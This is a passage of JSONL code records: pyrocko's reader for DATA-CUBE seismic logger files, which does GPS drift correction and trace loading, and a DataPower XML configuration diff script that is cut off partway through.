+{"seq_id": "7649788349", "text": "# http://pyrocko.org - GPLv3\n#\n# The Pyrocko Developers, 21st Century\n# ---|P------/S----------~Lg----------\n# python 2/3\nfrom __future__ import absolute_import\n\nimport os\nimport math\nimport logging\n\nimport numpy as num\n\nfrom pyrocko import trace, util, plot\nfrom pyrocko.guts import Object, Int, String, Timestamp\n\nfrom . import io_common\n\nlogger = logging.getLogger('pyrocko.io.datacube')\n\nN_GPS_TAGS_WANTED = 200 # must match definition in datacube_ext.c\n\n\ndef color(c):\n c = plot.color(c)\n return tuple(x/255. for x in c)\n\n\nclass DataCubeError(io_common.FileLoadError):\n pass\n\n\nclass ControlPointError(Exception):\n pass\n\n\ndef make_control_point(ipos_block, t_block, tref, deltat):\n\n # reduce time (no drift would mean straight line)\n tred = (t_block - tref) - ipos_block*deltat\n\n # first round, remove outliers\n q25, q75 = num.percentile(tred, (25., 75.))\n iok = num.logical_and(q25 <= tred, tred <= q75)\n\n # detrend\n slope, offset = num.polyfit(ipos_block[iok], tred[iok], 1)\n tred2 = tred - (offset + slope * ipos_block)\n\n # second round, remove outliers based on detrended tred, refit\n q25, q75 = num.percentile(tred2, (25., 75.))\n iok = num.logical_and(q25 <= tred2, tred2 <= q75)\n x = ipos_block[iok].copy()\n ipos0 = x[0]\n x -= ipos0\n y = tred[iok].copy()\n (slope, offset), cov = num.polyfit(x, y, 1, cov=True)\n\n slope_err, offset_err = num.sqrt(num.diag(cov))\n slope_err_limit = 1.0e-10\n offset_err_limit = 5.0e-3\n\n if slope_err > slope_err_limit:\n raise ControlPointError('slope error too large')\n\n if offset_err > offset_err_limit:\n raise ControlPointError('offset error too large')\n\n ic = ipos_block[ipos_block.size//2]\n tc = offset + slope * (ic - ipos0)\n\n return ic, tc + ic * deltat + tref\n\n\ndef analyse_gps_tags(header, gps_tags, offset, nsamples):\n\n ipos, t, fix, nsvs = gps_tags\n deltat = 1.0 / int(header['S_RATE'])\n\n tquartz = offset + ipos * deltat\n\n toff = t - tquartz\n toff_median = num.median(toff)\n\n n = t.size\n\n dtdt = (t[1:n] - t[0:n-1]) / (tquartz[1:n] - tquartz[0:n-1])\n\n ok = abs(toff_median - toff) < 10.\n\n xok = num.abs(dtdt - 1.0) < 0.00001\n\n ok[0] = False\n ok[1:n] &= xok\n ok[0:n-1] &= xok\n ok[n-1] = False\n\n ipos = ipos[ok]\n t = t[ok]\n fix = fix[ok]\n nsvs = nsvs[ok]\n\n blocksize = N_GPS_TAGS_WANTED // 2\n\n try:\n if ipos.size < blocksize:\n raise ControlPointError(\n 'could not safely determine time corrections from gps')\n\n j = 0\n control_points = []\n tref = num.median(t - ipos*deltat)\n while j < ipos.size - blocksize:\n ipos_block = ipos[j:j+blocksize]\n t_block = t[j:j+blocksize]\n try:\n ic, tc = make_control_point(ipos_block, t_block, tref, deltat)\n control_points.append((ic, tc))\n except ControlPointError:\n pass\n j += blocksize\n\n ipos_last = ipos[-blocksize:]\n t_last = t[-blocksize:]\n try:\n ic, tc = make_control_point(ipos_last, t_last, tref, deltat)\n control_points.append((ic, tc))\n except ControlPointError:\n pass\n\n if len(control_points) < 2:\n raise ControlPointError(\n 'could not safely determine time corrections from gps')\n\n i0, t0 = control_points[0]\n i1, t1 = control_points[1]\n i2, t2 = control_points[-2]\n i3, t3 = control_points[-1]\n if len(control_points) == 2:\n tmin = t0 - i0 * deltat - offset * deltat\n tmax = t3 + (nsamples - i3 - 1) * deltat\n else:\n icontrol = num.array(\n [x[0] for x in control_points], dtype=num.int64)\n tcontrol = num.array(\n [x[1] for x in control_points], dtype=num.float)\n # robust against steps:\n slope = num.median(\n (tcontrol[1:] - tcontrol[:-1])\n / (icontrol[1:] - icontrol[:-1]))\n\n tmin = t0 + (offset - i0) * slope\n tmax = t2 + (offset + nsamples - 1 - i2) * slope\n\n if offset < i0:\n control_points[0:0] = [(offset, tmin)]\n\n if offset + nsamples - 1 > i3:\n control_points.append((offset + nsamples - 1, tmax))\n\n icontrol = num.array([x[0] for x in control_points], dtype=num.int64)\n tcontrol = num.array([x[1] for x in control_points], dtype=num.float)\n\n return tmin, tmax, icontrol, tcontrol, ok\n\n except ControlPointError:\n\n tmin = util.str_to_time(header['S_DATE'] + header['S_TIME'],\n format='%y/%m/%d%H:%M:%S')\n\n idat = int(header['DAT_NO'])\n if idat == 0:\n tmin = tmin + util.gps_utc_offset(tmin)\n else:\n tmin = util.day_start(tmin + idat * 24.*3600.) \\\n + util.gps_utc_offset(tmin)\n\n tmax = tmin + (nsamples - 1) * deltat\n icontrol, tcontrol = None, None\n return tmin, tmax, icontrol, tcontrol, None\n\n\ndef plot_timeline(fns):\n from matplotlib import pyplot as plt\n\n fig = plt.figure()\n axes = fig.gca()\n\n h = 3600.\n\n if isinstance(fns, str):\n fn = fns\n if os.path.isdir(fn):\n fns = [\n os.path.join(fn, entry) for entry in sorted(os.listdir(fn))]\n\n ipos, t, fix, nsvs, header, offset, nsamples = \\\n get_timing_context(fns)\n\n else:\n ipos, t, fix, nsvs, header, offset, nsamples = \\\n get_extended_timing_context(fn)\n\n else:\n ipos, t, fix, nsvs, header, offset, nsamples = \\\n get_timing_context(fns)\n\n deltat = 1.0 / int(header['S_RATE'])\n\n tref = num.median(t - ipos * deltat)\n tref = round(tref / deltat) * deltat\n\n x = ipos*deltat\n y = (t - tref) - ipos*deltat\n\n bfix = fix != 0\n bnofix = fix == 0\n\n tmin, tmax, icontrol, tcontrol, ok = analyse_gps_tags(\n header, (ipos, t, fix, nsvs), offset, nsamples)\n\n la = num.logical_and\n nok = num.logical_not(ok)\n\n axes.plot(\n x[la(bfix, ok)]/h, y[la(bfix, ok)], '+',\n ms=5, color=color('chameleon3'))\n axes.plot(\n x[la(bfix, nok)]/h, y[la(bfix, nok)], '+',\n ms=5, color=color('aluminium4'))\n\n axes.plot(\n x[la(bnofix, ok)]/h, y[la(bnofix, ok)], 'x',\n ms=5, color=color('chocolate3'))\n axes.plot(\n x[la(bnofix, nok)]/h, y[la(bnofix, nok)], 'x',\n ms=5, color=color('aluminium4'))\n\n tred = tcontrol - icontrol*deltat - tref\n axes.plot(icontrol*deltat/h, tred, color=color('aluminium6'))\n axes.plot(icontrol*deltat/h, tred, 'o', ms=5, color=color('aluminium6'))\n\n ymin = (math.floor(tred.min() / deltat)-1) * deltat\n ymax = (math.ceil(tred.max() / deltat)+1) * deltat\n\n # axes.set_ylim(ymin, ymax)\n if ymax - ymin < 1000 * deltat:\n ygrid = math.floor(tred.min() / deltat) * deltat\n while ygrid < ymax:\n axes.axhline(ygrid, color=color('aluminium4'), alpha=0.3)\n ygrid += deltat\n\n xmin = icontrol[0]*deltat/h\n xmax = icontrol[-1]*deltat/h\n xsize = xmax - xmin\n xmin -= xsize * 0.1\n xmax += xsize * 0.1\n axes.set_xlim(xmin, xmax)\n\n axes.set_ylim(ymin, ymax)\n\n axes.set_xlabel('Uncorrected (quartz) time [h]')\n axes.set_ylabel('Relative time correction [s]')\n\n plt.show()\n\n\ng_dir_contexts = {}\n\n\nclass DirContextEntry(Object):\n path = String.T()\n tstart = Timestamp.T()\n ifile = Int.T()\n\n\nclass DirContext(Object):\n path = String.T()\n mtime = Timestamp.T()\n entries = DirContextEntry.T()\n\n def get_entry(self, fn):\n path = os.path.abspath(fn)\n for entry in self.entries:\n if entry.path == path:\n return entry\n\n raise Exception('entry not found')\n\n def iter_entries(self, fn, step=1):\n current = self.get_entry(fn)\n by_ifile = dict(\n (entry.ifile, entry) for entry in self.entries\n if entry.tstart == current.tstart)\n\n icurrent = current.ifile\n while True:\n icurrent += step\n try:\n yield by_ifile[icurrent]\n\n except KeyError:\n break\n\n\ndef context(fn):\n from pyrocko import datacube_ext\n\n dpath = os.path.dirname(os.path.abspath(fn))\n mtimes = [os.stat(dpath)[8]]\n\n dentries = sorted([os.path.join(dpath, f) for f in os.listdir(dpath)\n if os.path.isfile(os.path.join(dpath, f))])\n for dentry in dentries:\n fn2 = os.path.join(dpath, dentry)\n mtimes.append(os.stat(fn2)[8])\n\n mtime = float(max(mtimes))\n\n if dpath in g_dir_contexts:\n dir_context = g_dir_contexts[dpath]\n if dir_context.mtime == mtime:\n return dir_context\n\n del g_dir_contexts[dpath]\n\n entries = []\n for dentry in dentries:\n fn2 = os.path.join(dpath, dentry)\n if not os.path.isfile(fn2):\n continue\n\n with open(fn2, 'rb') as f:\n first512 = f.read(512)\n if not detect(first512):\n continue\n\n with open(fn2, 'rb') as f:\n try:\n header, data_arrays, gps_tags, nsamples, _ = \\\n datacube_ext.load(f.fileno(), 3, 0, -1, None)\n\n except datacube_ext.DataCubeError as e:\n e = DataCubeError(str(e))\n e.set_context('filename', fn)\n raise e\n\n header = dict(header)\n entries.append(DirContextEntry(\n path=os.path.abspath(fn2),\n tstart=util.str_to_time(\n '20' + header['S_DATE'] + ' ' + header['S_TIME'],\n format='%Y/%m/%d %H:%M:%S'),\n ifile=int(header['DAT_NO'])))\n\n dir_context = DirContext(mtime=mtime, path=dpath, entries=entries)\n\n return dir_context\n\n\ndef get_time_infos(fn):\n from pyrocko import datacube_ext\n\n with open(fn, 'rb') as f:\n try:\n header, _, gps_tags, nsamples, _ = datacube_ext.load(\n f.fileno(), 1, 0, -1, None)\n\n except datacube_ext.DataCubeError as e:\n e = DataCubeError(str(e))\n e.set_context('filename', fn)\n raise e\n\n return dict(header), gps_tags, nsamples\n\n\ndef get_timing_context(fns):\n joined = [[], [], [], []]\n ioff = 0\n for fn in fns:\n header, gps_tags, nsamples = get_time_infos(fn)\n\n ipos = gps_tags[0]\n ipos += ioff\n\n for i in range(4):\n joined[i].append(gps_tags[i])\n\n ioff += nsamples\n\n ipos, t, fix, nsvs = [num.concatenate(x) for x in joined]\n\n nsamples = ioff\n return ipos, t, fix, nsvs, header, 0, nsamples\n\n\ndef get_extended_timing_context(fn):\n c = context(fn)\n\n header, gps_tags, nsamples_base = get_time_infos(fn)\n\n ioff = 0\n aggregated = [gps_tags]\n\n nsamples_total = nsamples_base\n\n if num.sum(gps_tags[2]) == 0:\n\n ioff = nsamples_base\n for entry in c.iter_entries(fn, 1):\n\n _, gps_tags, nsamples = get_time_infos(entry.path)\n\n ipos = gps_tags[0]\n ipos += ioff\n\n aggregated.append(gps_tags)\n nsamples_total += nsamples\n\n if num.sum(gps_tags[2]) > 0:\n break\n\n ioff += nsamples\n\n ioff = 0\n for entry in c.iter_entries(fn, -1):\n\n _, gps_tags, nsamples = get_time_infos(entry.path)\n\n ioff -= nsamples\n\n ipos = gps_tags[0]\n ipos += ioff\n\n aggregated[0:0] = [gps_tags]\n\n nsamples_total += nsamples\n\n if num.sum(gps_tags[2]) > 0:\n break\n\n ipos, t, fix, nsvs = [num.concatenate(x) for x in zip(*aggregated)]\n\n# return ipos, t, fix, nsvs, header, ioff, nsamples_total\n return ipos, t, fix, nsvs, header, 0, nsamples_base\n\n\ndef iload(fn, load_data=True, interpolation='sinc'):\n from pyrocko import datacube_ext\n from pyrocko import signal_ext\n\n if interpolation not in ('sinc', 'off'):\n raise NotImplementedError(\n 'no such interpolation method: %s' % interpolation)\n\n with open(fn, 'rb') as f:\n if load_data:\n loadflag = 2\n else:\n loadflag = 1\n\n try:\n header, data_arrays, gps_tags, nsamples, _ = datacube_ext.load(\n f.fileno(), loadflag, 0, -1, None)\n\n except datacube_ext.DataCubeError as e:\n e = DataCubeError(str(e))\n e.set_context('filename', fn)\n raise e\n\n header = dict(header)\n deltat = 1.0 / int(header['S_RATE'])\n nchannels = int(header['CH_NUM'])\n\n ipos, t, fix, nsvs, header_, offset_, nsamples_ = \\\n get_extended_timing_context(fn)\n\n tmin, tmax, icontrol, tcontrol, _ = analyse_gps_tags(\n header_, (ipos, t, fix, nsvs), offset_, nsamples_)\n\n if icontrol is None:\n logger.warn(\n 'No usable GPS timestamps found. Using datacube header '\n 'information to guess time. (file: \"%s\")' % fn)\n\n tmin_ip = round(tmin / deltat) * deltat\n if interpolation != 'off':\n tmax_ip = round(tmax / deltat) * deltat\n else:\n tmax_ip = tmin_ip + (nsamples-1) * deltat\n\n nsamples_ip = int(round((tmax_ip - tmin_ip)/deltat)) + 1\n # to prevent problems with rounding errors:\n tmax_ip = tmin_ip + (nsamples_ip-1) * deltat\n\n leaps = num.array(\n [x[0] + util.gps_utc_offset(x[0]) for x in util.read_leap_seconds2()],\n dtype=num.float)\n\n if load_data and icontrol is not None:\n ncontrol_this = num.sum(\n num.logical_and(0 <= icontrol, icontrol < nsamples))\n\n if ncontrol_this <= 1:\n logger.warn(\n 'Extrapolating GPS time information from directory context '\n '(insufficient number of GPS timestamps in file: \"%s\").' % fn)\n\n for i in range(nchannels):\n if load_data:\n arr = data_arrays[i]\n assert arr.size == nsamples\n\n if interpolation == 'sinc' and icontrol is not None:\n\n ydata = num.empty(nsamples_ip, dtype=num.float)\n try:\n signal_ext.antidrift(\n icontrol, tcontrol,\n arr.astype(num.float), tmin_ip, deltat, ydata)\n\n except signal_ext.Error as e:\n e = DataCubeError(str(e))\n e.set_context('filename', fn)\n e.set_context('n_control_points', icontrol.size)\n e.set_context('n_samples_raw', arr.size)\n e.set_context('n_samples_ip', ydata.size)\n e.set_context('tmin_ip', util.time_to_str(tmin_ip))\n raise e\n\n ydata = num.round(ydata).astype(arr.dtype)\n else:\n ydata = arr\n\n tr_tmin = tmin_ip\n tr_tmax = None\n else:\n ydata = None\n tr_tmin = tmin_ip\n tr_tmax = tmax_ip\n\n tr = trace.Trace('', header['DEV_NO'], '', 'p%i' % i, deltat=deltat,\n ydata=ydata, tmin=tr_tmin, tmax=tr_tmax, meta=header)\n\n bleaps = num.logical_and(tmin_ip <= leaps, leaps < tmax_ip)\n\n if num.any(bleaps):\n assert num.sum(bleaps) == 1\n tcut = leaps[bleaps][0]\n\n for tmin_cut, tmax_cut in [\n (tr.tmin, tcut), (tcut, tr.tmax+tr.deltat)]:\n\n try:\n tr_cut = tr.chop(tmin_cut, tmax_cut, inplace=False)\n tr_cut.shift(\n util.utc_gps_offset(0.5*(tr_cut.tmin+tr_cut.tmax)))\n yield tr_cut\n\n except trace.NoData:\n pass\n\n else:\n tr.shift(util.utc_gps_offset(0.5*(tr.tmin+tr.tmax)))\n yield tr\n\n\nheader_keys = {\n str: b'GIPP_V DEV_NO E_NAME GPS_PO S_TIME S_DATE DAT_NO'.split(),\n int: b'''P_AMPL CH_NUM S_RATE D_FILT C_MODE A_CHOP F_TIME GPS_TI GPS_OF\n A_FILT A_PHAS GPS_ON ACQ_ON V_TCXO D_VOLT E_VOLT'''.split()}\n\nall_header_keys = header_keys[str] + header_keys[int]\n\n\ndef detect(first512):\n s = first512\n\n if len(s) < 512:\n return False\n\n if ord(s[0:1]) >> 4 != 15:\n return False\n\n n = s.find(b'\\x80')\n if n == -1:\n n = len(s)\n\n s = s[1:n]\n s = s.replace(b'\\xf0', b'')\n s = s.replace(b';', b' ')\n s = s.replace(b'=', b' ')\n kvs = s.split(b' ')\n\n if len([k for k in all_header_keys if k in kvs]) == 0:\n return False\n return True\n\n\nif __name__ == '__main__':\n import sys\n fns = sys.argv[1:]\n if len(fns) > 1:\n plot_timeline(fns)\n else:\n plot_timeline(fns[0])\n", "repo_name": "wuxyair/pyrocko", "sub_path": "src/io/datacube.py", "file_name": "datacube.py", "file_ext": "py", "file_size_in_byte": 16718, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "pyrocko.plot.color", "line_number": 25, "usage_type": "call"}, {"api_name": "pyrocko.plot", "line_number": 25, "usage_type": "name"}, {"api_name": "numpy.percentile", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 144, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 146, "usage_type": "attribute"}, {"api_name": "numpy.median", "line_number": 148, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 161, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 162, "usage_type": "attribute"}, {"api_name": "pyrocko.util.str_to_time", "line_number": 168, "usage_type": "call"}, {"api_name": "pyrocko.util", "line_number": 168, "usage_type": "name"}, {"api_name": "pyrocko.util.gps_utc_offset", "line_number": 173, "usage_type": "call"}, {"api_name": "pyrocko.util", "line_number": 173, "usage_type": "name"}, {"api_name": "pyrocko.util.day_start", "line_number": 175, "usage_type": "call"}, {"api_name": "pyrocko.util", "line_number": 175, "usage_type": "name"}, {"api_name": "pyrocko.util.gps_utc_offset", "line_number": 176, "usage_type": "call"}, {"api_name": "pyrocko.util", "line_number": 176, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 193, "usage_type": "call"}, {"api_name": "os.path", "line_number": 193, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path", "line_number": 195, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 222, "usage_type": "attribute"}, {"api_name": "numpy.logical_not", "line_number": 223, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 243, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 244, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 248, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 265, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 265, "usage_type": "name"}, {"api_name": "pyrocko.guts.Object", "line_number": 271, "usage_type": "name"}, {"api_name": "pyrocko.guts.String.T", "line_number": 272, "usage_type": "call"}, {"api_name": "pyrocko.guts.String", "line_number": 272, "usage_type": "name"}, {"api_name": "pyrocko.guts.Timestamp.T", "line_number": 273, "usage_type": "call"}, {"api_name": "pyrocko.guts.Timestamp", "line_number": 273, "usage_type": "name"}, {"api_name": "pyrocko.guts.Int.T", "line_number": 274, "usage_type": "call"}, {"api_name": "pyrocko.guts.Int", "line_number": 274, "usage_type": "name"}, {"api_name": "pyrocko.guts.Object", "line_number": 277, "usage_type": "name"}, {"api_name": "pyrocko.guts.String.T", "line_number": 278, "usage_type": "call"}, {"api_name": "pyrocko.guts.String", "line_number": 278, "usage_type": "name"}, {"api_name": "pyrocko.guts.Timestamp.T", "line_number": 279, "usage_type": "call"}, {"api_name": "pyrocko.guts.Timestamp", "line_number": 279, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 283, "usage_type": "call"}, {"api_name": "os.path", "line_number": 283, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 309, "usage_type": "call"}, {"api_name": "os.path", "line_number": 309, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 309, "usage_type": "call"}, {"api_name": "os.stat", "line_number": 310, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 312, "usage_type": "call"}, {"api_name": "os.path", "line_number": 312, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 312, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 313, "usage_type": "call"}, {"api_name": "os.path", "line_number": 313, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 313, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 315, "usage_type": "call"}, {"api_name": "os.path", "line_number": 315, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 316, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 329, "usage_type": "call"}, {"api_name": "os.path", "line_number": 329, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 330, "usage_type": "call"}, {"api_name": "os.path", "line_number": 330, "usage_type": "attribute"}, {"api_name": "pyrocko.datacube_ext.load", "line_number": 341, "usage_type": "call"}, {"api_name": "pyrocko.datacube_ext", "line_number": 341, "usage_type": "name"}, {"api_name": "pyrocko.datacube_ext.DataCubeError", "line_number": 343, "usage_type": "attribute"}, {"api_name": "pyrocko.datacube_ext", "line_number": 343, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 350, "usage_type": "call"}, {"api_name": "os.path", "line_number": 350, "usage_type": "attribute"}, {"api_name": "pyrocko.util.str_to_time", "line_number": 351, "usage_type": "call"}, {"api_name": "pyrocko.util", "line_number": 351, "usage_type": "name"}, {"api_name": "pyrocko.datacube_ext.load", "line_number": 366, "usage_type": "call"}, {"api_name": "pyrocko.datacube_ext", "line_number": 366, "usage_type": "name"}, {"api_name": "pyrocko.datacube_ext.DataCubeError", "line_number": 369, "usage_type": "attribute"}, {"api_name": "pyrocko.datacube_ext", "line_number": 369, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 391, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 407, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 420, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 439, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 442, "usage_type": "call"}, {"api_name": "pyrocko.datacube_ext.load", "line_number": 463, "usage_type": "call"}, {"api_name": "pyrocko.datacube_ext", "line_number": 463, "usage_type": "name"}, {"api_name": "pyrocko.datacube_ext.DataCubeError", "line_number": 466, "usage_type": "attribute"}, {"api_name": "pyrocko.datacube_ext", "line_number": 466, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 496, "usage_type": "call"}, {"api_name": "pyrocko.util.gps_utc_offset", "line_number": 497, "usage_type": "call"}, {"api_name": "pyrocko.util", "line_number": 497, "usage_type": "name"}, {"api_name": "pyrocko.util.read_leap_seconds2", "line_number": 497, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 498, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 501, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 502, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 516, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 516, "usage_type": "attribute"}, {"api_name": "pyrocko.signal_ext.antidrift", "line_number": 518, "usage_type": "call"}, {"api_name": "pyrocko.signal_ext", "line_number": 518, "usage_type": "name"}, {"api_name": "numpy.float", "line_number": 520, "usage_type": "attribute"}, {"api_name": "pyrocko.signal_ext.Error", "line_number": 522, "usage_type": "attribute"}, {"api_name": "pyrocko.signal_ext", "line_number": 522, "usage_type": "name"}, {"api_name": "pyrocko.util.time_to_str", "line_number": 528, "usage_type": "call"}, {"api_name": "pyrocko.util", "line_number": 528, "usage_type": "name"}, {"api_name": "numpy.round", "line_number": 531, "usage_type": "call"}, {"api_name": "pyrocko.trace.Trace", "line_number": 542, "usage_type": "call"}, {"api_name": "pyrocko.trace", "line_number": 542, "usage_type": "name"}, {"api_name": "numpy.logical_and", "line_number": 545, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 547, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 548, "usage_type": "call"}, {"api_name": "pyrocko.util.utc_gps_offset", "line_number": 557, "usage_type": "call"}, {"api_name": "pyrocko.util", "line_number": 557, "usage_type": "name"}, {"api_name": "pyrocko.trace.NoData", "line_number": 560, "usage_type": "attribute"}, {"api_name": "pyrocko.trace", "line_number": 560, "usage_type": "name"}, {"api_name": "pyrocko.util.utc_gps_offset", "line_number": 564, "usage_type": "call"}, {"api_name": "pyrocko.util", "line_number": 564, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 602, "usage_type": "attribute"}]}
+{"seq_id": "18423106603", "text": "import os\nimport io\nimport sys\nimport difflib\nimport hashlib\nfrom lxml import etree\nfrom mast.cli import Cli\nfrom mast.hashes import get_sha256\nfrom mast.logging import make_logger\nfrom itertools import groupby, combinations\nfrom collections import OrderedDict, defaultdict\nfrom glob import glob\n\nremove_namespaces_xslt = '''\n\n\n\n \n \n \n \n\n\n \n \n \n \n\n\n \n \n \n \n \n'''\nremove_namespaces_xslt = etree.parse(io.BytesIO(str.encode(remove_namespaces_xslt)))\nREMOVE_NAMESPACES = etree.XSLT(remove_namespaces_xslt)\n\ndef sort_children(node):\n children = node.xpath(\"./*\")\n children = sorted(children, key=lambda child: child.tag)\n groups = groupby(children, key=lambda child: child.tag)\n groups = dict((x, list(y)) for x, y in groups)\n for k in sorted(groups.keys()):\n for child in sorted(groups[k], key=lambda child: child.get(\"name\")):\n if len(child):\n sort_children(child)\n _attrib = OrderedDict((k, v) for k, v in sorted(child.attrib.items(), key=lambda n: n[0]))\n node.remove(child)\n child.attrib.clear()\n child.attrib.update(_attrib)\n node.append(child)\n\ndef clean(tree):\n for node in tree.xpath(\"/datapower-configuration/export-details\"):\n tree.remove(node)\n for node in tree.xpath(\"/datapower-configuration/interface-data\"):\n tree.remove(node)\n for node in tree.xpath(\"/datapower-configuration/files\"):\n tree.remove(node)\n for node in tree.xpath(\".//*\"):\n if \"intrinsic\" in node.attrib:\n del node.attrib[\"intrinsic\"]\n if \"read-only\" in node.attrib:\n del node.attrib[\"read-only\"]\n\ndef get_obj_path(node):\n return '/{}/{}[@name=\"{}\"]'.format(\n \"/\".join(\n anc.tag for anc in reversed(list(node.iterancestors()))\n ),\n node.tag,\n node.get(\"name\")\n )\n\nHTML_TABLE = \"\"\"\n\n \n \n \n \n {}\n \n\n\"\"\"\nTABLE_ROW = \"\"\"\n \n {}\n
\n\"\"\"\n\ndef main(\n xcfg_globs=[],\n out_dir=\"tmp\",\n wrapcolumn=80,\n tabsize=4,\n no_only_differences=False,\n no_remove_namespaces=False,\n ):\n only_differences = not no_only_differences\n remove_namespaces = not no_remove_namespaces\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n parser = etree.XMLParser(\n remove_blank_text=True,\n strip_cdata=False,\n )\n differ = difflib.HtmlDiff(wrapcolumn=wrapcolumn, tabsize=tabsize)\n filenames = set()\n # Clean up xml documents\n for pattern in xcfg_globs:\n for filename in glob(pattern):\n filenames.add(os.path.abspath(filename))\n tree = etree.parse(filename, parser).getroot()\n if remove_namespaces:\n tree = REMOVE_NAMESPACES(tree).getroot()\n clean(tree)\n sort_children(tree)\n with open(filename, \"wb\") as fp:\n fp.write(etree.tostring(tree, pretty_print=True))\n # Cast to a list for order\n filenames = list(filenames)\n # sort by basename\n common_prefix = os.path.dirname(os.path.commonprefix(filenames))\n _filenames = map(\n lambda x: x.replace(common_prefix, \"\"),\n filenames,\n )\n\n # remove leading path seperator\n _filenames = map(\n lambda x: x.lstrip(os.path.sep),\n _filenames,\n )\n\n # Sort by dirname\n _filenames.sort(key=lambda p: p.split(os.path.sep))\n\n # sort by filename\n _filenames.sort(key=os.path.basename)\n\n for filename in _filenames:\n print(\"{} {}\".format(get_sha256(os.path.join(common_prefix, filename)), filename))\n\n for index, (left_filename, right_filename) in enumerate(combinations(filenames, 2)):\n if get_sha256(left_filename) == get_sha256(right_filename):\n continue\n html_rows = []\n left_tree = etree.parse(left_filename, parser)\n left_config = left_tree.getroot().xpath(\"/datapower-configuration/configuration\")[0]\n right_tree = etree.parse(right_filename, parser)\n right_config = right_tree.getroot().xpath(\"/datapower-configuration/configuration\")[0]\n for lchild in left_config.iterchildren():\n lpath = get_obj_path(lchild)\n rchild = right_config.xpath(lpath)\n if not rchild:\n rside = \"{}\\n\".format(\" \"*(wrapcolumn-1)) * len(etree.tostring(lchild, pretty_print=True).splitlines())\n rside = rside.splitlines()\n html_rows.append(\n TABLE_ROW.format(\n differ.make_table(\n etree.tostring(lchild, pretty_print=True).splitlines(),\n rside,\n left_filename,\n right_filename,\n )\n )\n )\n elif len(rchild) > 1:\n raise ValueError(\"ERROR: Path {} was expected to be unique but yielded {} results\".format(lpath, len(rchild)))\n else:\n rchild = rchild[0]\n str_lchild = etree.tostring(lchild, pretty_print=True)\n str_rchild = etree.tostring(rchild, pretty_print=True)\n if only_differences and hashlib.sha256(str_lchild).hexdigest() == hashlib.sha256(str_rchild).hexdigest():\n pass\n else:\n html_rows.append(\n TABLE_ROW.format(\n differ.make_table(\n str_lchild.splitlines(),\n str_rchild.splitlines(),\n left_filename,\n right_filename,\n )\n )\n )\n for rchild in right_config.iterchildren():\n rpath = get_obj_path(rchild)\n lchild = left_config.xpath(rpath)\n if not lchild:\n lside = \"{}\\n\".format(\" \"*(wrapcolumn-1)) * len(etree.tostring(rchild, pretty_print=True).splitlines())\n lside = lside.splitlines()\n html_rows.append(\n TABLE_ROW.format(\n differ.make_table(\n lside,\n etree.tostring(rchild, pretty_print=True).splitlines(),\n left_filename,\n right_filename,\n )\n )\n )\n diff_filename = \"{}-{}-vs-{}-{}.html\".format(\n index,\n \"_\".join(list(OrderedDict.fromkeys([x for x in left_filename.split(os.path.sep) if x not in right_filename.split(os.path.sep)]))),\n \"_\".join(list(OrderedDict.fromkeys([x for x in 